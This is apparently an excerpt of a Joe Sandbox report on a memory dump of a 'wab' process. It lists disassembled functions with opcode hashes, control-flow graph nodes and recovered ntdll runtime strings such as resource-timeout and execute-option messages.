                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d875a003bda9848cdbc292364d9e96e26a85b0e120b9e7cce02521cba628924a
                                                              • Instruction ID: aa7f217fc3419ebeb051d3834645ee225ac023e75a222dd4b59b7c5f7f2cc82b
                                                              • Opcode Fuzzy Hash: d875a003bda9848cdbc292364d9e96e26a85b0e120b9e7cce02521cba628924a
                                                              • Instruction Fuzzy Hash: 8A900261242441925655B1D94844507400657E0241795C113A6414950C85269DA6DA21
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252E30 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1787ba6db8e49a746c76a67c21b35ef2bebbe3fb7df7b7e14e5c3d8054d5cf1d
                                                              • Instruction ID: d5736369f54d813d0766e41ae716582dcfcae1e0c1c3aea8798b82205d9fb023
                                                              • Opcode Fuzzy Hash: 1787ba6db8e49a746c76a67c21b35ef2bebbe3fb7df7b7e14e5c3d8054d5cf1d
                                                              • Instruction Fuzzy Hash: 3B90026130140442D21271D94854606000987D1345F95C113E6424555D86258EA3A532
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252EA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a85dd26bda5b00f8f295b399066aa1ae4adb26c23e2f980b8579ba36fca98c31
                                                              • Instruction ID: c351c47f0928511a2204df63334548a3892e5aa91dea340ac83688f0964adfbc
                                                              • Opcode Fuzzy Hash: a85dd26bda5b00f8f295b399066aa1ae4adb26c23e2f980b8579ba36fca98c31
                                                              • Instruction Fuzzy Hash: 4A9002B120140442D25071D94844746000547D0301F55C113AA064554E86598EE56A65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252E80 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 136f5122d9b44e72956a0c2281e0c79f3a4aa4912678d27b4e9e5471e70c89e5
                                                              • Instruction ID: 35e789d7a30e4b9c437a8951526e7be9df42c93b1ffcdaa1c4d22279408b02f7
                                                              • Opcode Fuzzy Hash: 136f5122d9b44e72956a0c2281e0c79f3a4aa4912678d27b4e9e5471e70c89e5
                                                              • Instruction Fuzzy Hash: 3A90026160140542D21171D94844616000A47D0241F95C123A6024555ECA258EE2A531
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252EE0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6ea44b5c1bfb1b58bfa866cb359b9d73dd178f94f76fae5cdeee91a2a6898abf
                                                              • Instruction ID: 1c28b143d094e4cfea7d536617f8f9d114e194ca8af70a59e1da243f191b647f
                                                              • Opcode Fuzzy Hash: 6ea44b5c1bfb1b58bfa866cb359b9d73dd178f94f76fae5cdeee91a2a6898abf
                                                              • Instruction Fuzzy Hash: F99002A120180443D25075D94C44607000547D0302F55C113A7064555E8A298DA16535
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1ca3c605ac0d5178afb4cdc3135679f8144ad30fd5951214f854616f70a43281
                                                              • Instruction ID: acbc15194a65ccd963b568fd2e91a9372712a7095ded680748a2203bb5611d6c
                                                              • Opcode Fuzzy Hash: 1ca3c605ac0d5178afb4cdc3135679f8144ad30fd5951214f854616f70a43281
                                                              • Instruction Fuzzy Hash: DD9002A134140482D21071D94854B06000587E1301F55C117E6064554D8619CDA26526
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252F60 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e5d9b6905b80a6cf8a09a590f478bfc6acebc5acc0a2780ad5384c802920470c
                                                              • Instruction ID: 98d84a6e333d7d10c3dec56204513db2f8a5579c0daea1e5bfa626c32fa6bf11
                                                              • Opcode Fuzzy Hash: e5d9b6905b80a6cf8a09a590f478bfc6acebc5acc0a2780ad5384c802920470c
                                                              • Instruction Fuzzy Hash: C69002A121140082D21471D94844706004547E1201F55C113A7154554CC5298DB15525
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252FA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 06417767926073869f71894dd07822ac5af809bb50f7aa2a559e735fc8a8748a
                                                              • Instruction ID: d4186eee3ac003b26e9587ddf9a7c9ad9603378332b0f4a0feb050f0e693dc30
                                                              • Opcode Fuzzy Hash: 06417767926073869f71894dd07822ac5af809bb50f7aa2a559e735fc8a8748a
                                                              • Instruction Fuzzy Hash: 1990027120180442D21071D94C48747000547D0302F55C113AA164555E8665CDE16931
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252FB0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a9b961830b74bcb5efc5f18e9ef2dfa119a10f35d3b6e096792cd90c5cdf16ad
                                                              • Instruction ID: 752dc4385e818553ad83d897c1c2d9a828de49689e0b58ec49a5b1705ee0fd38
                                                              • Opcode Fuzzy Hash: a9b961830b74bcb5efc5f18e9ef2dfa119a10f35d3b6e096792cd90c5cdf16ad
                                                              • Instruction Fuzzy Hash: 0090026160140082425071E98C8490640056BE1211755C223A5998550D85598DB55A65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252F90 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a323b05c015c88a12e84ab4ba51eb7dfac805382a84afcbbaec309fc88c8322f
                                                              • Instruction ID: 2caded0b02fe9cdcab83a2ef8834d8980e4e1203cc0ce0169d77b5f7300598de
                                                              • Opcode Fuzzy Hash: a323b05c015c88a12e84ab4ba51eb7dfac805382a84afcbbaec309fc88c8322f
                                                              • Instruction Fuzzy Hash: 6890027120180442D21071D94C5470B000547D0302F55C113A6164555D86258DA16971
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252FE0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 84c00a2a07a5bdc24877651870a638baab0d417e445f1bd811a211d6dabf9a69
                                                              • Instruction ID: 098e95fb160f5b2c04754750582fe1d01d97a9b4b7ca7ae672a3e92c63115dbf
                                                              • Opcode Fuzzy Hash: 84c00a2a07a5bdc24877651870a638baab0d417e445f1bd811a211d6dabf9a69
                                                              • Instruction Fuzzy Hash: 01900261211C0082D31075E94C54B07000547D0303F55C217A5154554CC9158DB15921
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction ID: caca748ad1c0c3f058dda47226531a3d9f4a5d8ac76fae98ba9ce0301710313f
                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction Fuzzy Hash:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 680 20252890-202528b3 681 2028a4bc-2028a4c0 680->681 682 202528b9-202528cc 680->682 681->682 685 2028a4c6-2028a4ca 681->685 683 202528dd-202528df 682->683 684 202528ce-202528d7 682->684 687 202528e1-202528e5 683->687 684->683 686 2028a57e-2028a585 684->686 685->682 688 2028a4d0-2028a4d4 685->688 686->683 690 20252988-2025298e 687->690 691 202528eb-202528fa 687->691 688->682 689 2028a4da-2028a4de 688->689 689->682 692 2028a4e4-2028a4eb 689->692 695 20252908-2025290c 690->695 693 2028a58a-2028a58d 691->693 694 20252900-20252905 691->694 696 2028a4ed-2028a4f4 692->696 697 2028a564-2028a56c 692->697 693->695 694->695 695->687 698 2025290e-2025291b 695->698 699 2028a50b 696->699 700 2028a4f6-2028a4fe 696->700 697->682 703 2028a572-2028a576 697->703 701 20252921 698->701 702 2028a592-2028a599 698->702 705 2028a510-2028a536 call 20260050 699->705 700->682 704 2028a504-2028a509 700->704 706 20252924-20252926 701->706 709 2028a5a1-2028a5c9 call 20260050 702->709 703->682 707 2028a57c call 20260050 703->707 704->705 721 2028a55d-2028a55f 705->721 711 20252993-20252995 706->711 712 20252928-2025292a 706->712 707->721 711->712 716 20252997-202529b1 call 20260050 711->716 717 20252946-20252966 call 20260050 712->717 718 2025292c-2025292e 712->718 730 20252969-20252974 716->730 717->730 718->717 724 20252930-20252944 call 20260050 718->724 727 20252981-20252985 721->727 724->717 730->706 731 20252976-20252979 730->731 731->709 732 2025297f 731->732 732->727
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: d395d7d8cbaa8ce23850d6c942cd38fbfd77367776238299c1cd54e75dc0d9d6
                                                              • Instruction ID: ed0fddfc160914961f0f66ff303ac7f6adf3d44c9f8b5dc520f3441926446a15
                                                              • Opcode Fuzzy Hash: d395d7d8cbaa8ce23850d6c942cd38fbfd77367776238299c1cd54e75dc0d9d6
                                                              • Instruction Fuzzy Hash: 6151FBB5A041167FDB14DFD88DC097EFBB8BB09204B60816BE464D7681D634DF689BE0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20247630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 937 20247630-20247651 938 20247653-2024766f call 2021e660 937->938 939 2024768b-20247699 call 20254c30 937->939 944 20284638 938->944 945 20247675-20247682 938->945 949 2028463f-20284645 944->949 946 20247684 945->946 947 2024769a-202476a9 call 20247818 945->947 946->939 953 20247701-2024770a 947->953 954 202476ab-202476c1 call 202477cd 947->954 951 202476c7-202476d0 call 20247728 949->951 952 2028464b-202846b8 call 2029f290 call 20259020 BaseQueryModuleData 949->952 951->953 962 202476d2 951->962 952->951 974 202846be-202846c6 952->974 957 202476d8-202476e1 953->957 954->949 954->951 964 202476e3-202476f2 call 2024771b 957->964 965 2024770c-2024770e 957->965 962->957 966 202476f4-202476f6 964->966 965->966 969 20247710-20247719 966->969 970 202476f8-202476fa 966->970 969->970 970->946 972 202476fc 970->972 975 202847be-202847d0 call 20252c50 972->975 974->951 976 202846cc-202846d3 974->976 975->946 976->951 978 202846d9-202846e4 976->978 980 202847b9 call 20254d48 978->980 981 202846ea-20284723 call 2029f290 call 2025aaa0 978->981 980->975 987 2028473b-2028476b call 2029f290 981->987 988 20284725-20284736 call 2029f290 981->988 987->951 993 20284771-2028477f call 2025a770 987->993 988->953 996 20284781-20284783 993->996 997 20284786-202847a3 call 2029f290 call 2028cf9e 993->997 996->997 997->951 1002 202847a9-202847b2 997->1002 1002->993 1003 202847b4 1002->1003 1003->951
                                                              Strings
                                                              • ExecuteOptions, xrefs: 202846A0
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 202846FC
                                                              • Execute=1, xrefs: 20284713
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 20284787
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 20284742
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 20284725
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 20284655
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              • Opcode ID: 0a673ff6f8d96b7831a6e5d5e5f4d057e0c89cc8da37c90c2ea4d1f2ebf48c1d
                                                              • Instruction ID: c5b70570c8af331e3f98526932745d30214a9a3698b4753406b94e6cd8c5b06e
                                                              • Opcode Fuzzy Hash: 0a673ff6f8d96b7831a6e5d5e5f4d057e0c89cc8da37c90c2ea4d1f2ebf48c1d
                                                              • Instruction Fuzzy Hash: A3512631A006196BDB19DFE4DC8AFAA77BDEF14304F51009BEA14A7191E730AE658F60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2025B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction ID: 65954b10a29291181aeb6b77301069fb00b9523cd72830fef8934ea876c18f6c
                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction Fuzzy Hash: 2D81D3B1E1124A8EDF0E8FE4CC917ADBFB5AF89350F14415BE850A7281C7349D688B58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2024BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 20287BAC
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 20287B7F
                                                              • RTL: Resource at %p, xrefs: 20287B8E
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 0-871070163
                                                              • Opcode ID: d8f83ba3e05bd5dcf6aea607099ddcda03c6b93ef6c26b6fa906da3f1cb16cda
                                                              • Instruction ID: b68d698d3d5ff732a126c68941db478f901f74ad359069e715e0f196ff35222a
                                                              • Opcode Fuzzy Hash: d8f83ba3e05bd5dcf6aea607099ddcda03c6b93ef6c26b6fa906da3f1cb16cda
                                                              • Instruction Fuzzy Hash: D741E239B007029FD719CEA5CC41B5AB7E5EF98710F100A1EF95997A80DB31E9298F91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2024B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2028728C
                                                              Strings
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 20287294
                                                              • RTL: Re-Waiting, xrefs: 202872C1
                                                              • RTL: Resource at %p, xrefs: 202872A3
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: f4fe4b1dd863b252ef77756bbcc21189440c4c4825a71981f5770b3cdca99572
                                                              • Instruction ID: c4445c357a9bcd55f7f8dffda73899c84c72456dce42c97f97287e68be4efcab
                                                              • Opcode Fuzzy Hash: f4fe4b1dd863b252ef77756bbcc21189440c4c4825a71981f5770b3cdca99572
                                                              • Instruction Fuzzy Hash: AA413239A00206ABD715CEA4CC41F16B7A1FF94310F20061AFD54AB681DB30F862CBE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20257D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction ID: 6015f7d019e427edebc05855a85e8900f99f92aac01fd48cce2cdf7e665011d6
                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction Fuzzy Hash: D291D770E802069BDB28DFD5EC81BAEBFB5AF44320F20451BE954E76C1D7349D688B18
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20219126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280
                                                              • Opcode ID: c320424a68c3df20d646742f71d08ec3ba8c4e9f288ffca69f2cbed2a8a6275e
